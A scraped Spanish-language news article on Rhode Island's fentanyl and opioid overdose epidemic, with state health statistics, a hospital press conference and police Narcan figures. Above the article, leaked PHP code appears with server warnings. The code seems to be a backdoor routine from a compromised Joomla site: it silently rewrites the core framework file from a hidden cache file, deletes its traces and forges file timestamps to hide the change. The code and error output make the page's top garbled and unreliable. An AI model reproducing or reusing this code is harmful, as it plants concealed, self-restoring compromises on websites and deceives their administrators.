$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Epidemia de sobredosis en Rhode Island 

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: PRIMERA PLANA

Epidemia de sobredosis en Rhode Island 

Imprimir PDF

alt

PROVIDENCE, RI.- Autoridades de salud, líderes municipales y de agencias de cumplimiento de ley, expresaron preocupación ante el recrudecimiento de los casos de sobredosis de drogas en Rhode Island, y la intensificación del uso de opioides como el fentanyl, una sustancia narcótica, más peligrosa que la heroína, a la que se atribuye un poder que es 50 a 100 veces mayor que la morfina.

De acuerdo con estadísticas del Departamento de Salud de Rhode Island, durante 2016 hubo 336 casos de sobredosis, un número superior al de 2015, cuando oficialmente fueron registrados 290 incidentes. Del total de sobredosis ocurridas en 2016, por lo menos 195 (58% de total) fueron atribuidas al fentanyl. 

Las estadísticas durante el primer trimestre del año en curso muestran una preocupante tendencia para el 2017. Entre el primero de enero y el primero de marzo hubo ocho muertes por sobredosis no conectadas con el referido opioide, y 23 que fueron producto de la mencionada sustancia. Las cifras no están completas, ya que no incluyen el total de muertes por sobredosis durante el mencionado período, de acuerdo con el Departamento de Salud. 

A finales de marzo pasado, solo en un hospital de la ciudad de Warwick (Kent Hospital) se reportaron 16 casos de sobredosis en apenas un fin de semana (del 24 al 27 de marzo), hecho que provocó la convocatoria de una rueda de prensa de emergencia, en las mismas instalaciones del centro de salud. Los estudios indicaron que la droga más frecuente en estos casos en particular fue la heroína. No se dio a conocer cuáles de las víctimas fueron fatales, “por razones de privacidad”. 

“El consumo de fentanyl ha emergido como la más significativa causa de la epidemia de sobredosis de drogas en Rhode Island. El grupo de prevención e intervención, creado por disposición de la gobernadora Gina Raimondo, está trabajando conjuntamente con las agencias de cumplimiento de ley, paramédicos, y hospitales como el Kent, en el uso de datos para organizar respuestas rápidas en la prevención de estos casos. Esto es un asunto de vida o muerte”, dijo a ACONTECER LATINO la doctora Nicole Alexander-Scott. 

En la rueda de prensa participaron la doctora Alexander-Scott; la coronel Ann Asumpico, jefa de la Policía Estatal y comisionada de Seguridad Pública de Rhode Island; el alcalde de Warwick, Scott Avedisian; Michael Dacey, director del Kent Hospital; Rebeca Boss, directora interina del Rhode Island Department of Behavioral Healthcare, Developmental Disabilities and Hospitals y miembros de la Asamblea General del estado. 

Por requerimiento del estado de Rhode Island, los hospitales del estado deben reportar dentro de 48 horas todos los incidentes de sobredosis en los que intervienen. La directora de Salud dijo que este mecanismo ayuda a movilizar rápidamente la acción estatal en los “clusters” donde se están produciendo los mayores casos de sobredosis. 

La funcionaria enfatizó en que la comunidad debe estar informada de que hay recursos disponibles para las personas que están lidiando con el consumo de narcóticos, sean prescriptos o no. Uno de esos recursos es la línea de ayuda (401) 942-7867, el sitio www.preventoverdose.org, así como varios programas de rehabilitación a los que es posible tener acceso a través del estado. 

La jefa de la Policía Estatal de Rhode Island expresó también su preocupación ante el incremento en los casos de sobredosis que están encontrando sus agentes en la carretera. “Estamos viendo esto mucho, y seguimos trabajando fuerte para darle respuesta de varias maneras”, dijo la coronel Assumpico. 

La oficial dijo que durante el 2016 la Policía Estatal arrestó a 125 personas en incidentes relacionados con la droga y se incautó de 17 kilos de heroína, 34 kilos de cocaína, además de una cantidad indeterminada de otros tipos de drogas y más de 30 armas de fuego.

También informó que su departamento adquirió 1,000 unidades del antídoto Narcan, que fueron entregadas a sus patrulleros en caso de que tengan que intervenir ante una situación de sobredosis. 

El pasado mes de marzo, un conductor que sufrió una sobredosis mientras manejaba se estrelló contra el frente de un negocio ubicado en la Plainfield Street, de Providence.

Los oficiales dijeron que Michael Ducharme, de 56 años estaba bajo los efectos de sustancias narcóticas cuando la van que conducía se estrelló contra el restaurante El Chapín. El hombre fue reanimado gracias a la aplicación del antídoto Narcan, y ahora enfrenta cargos por DUI.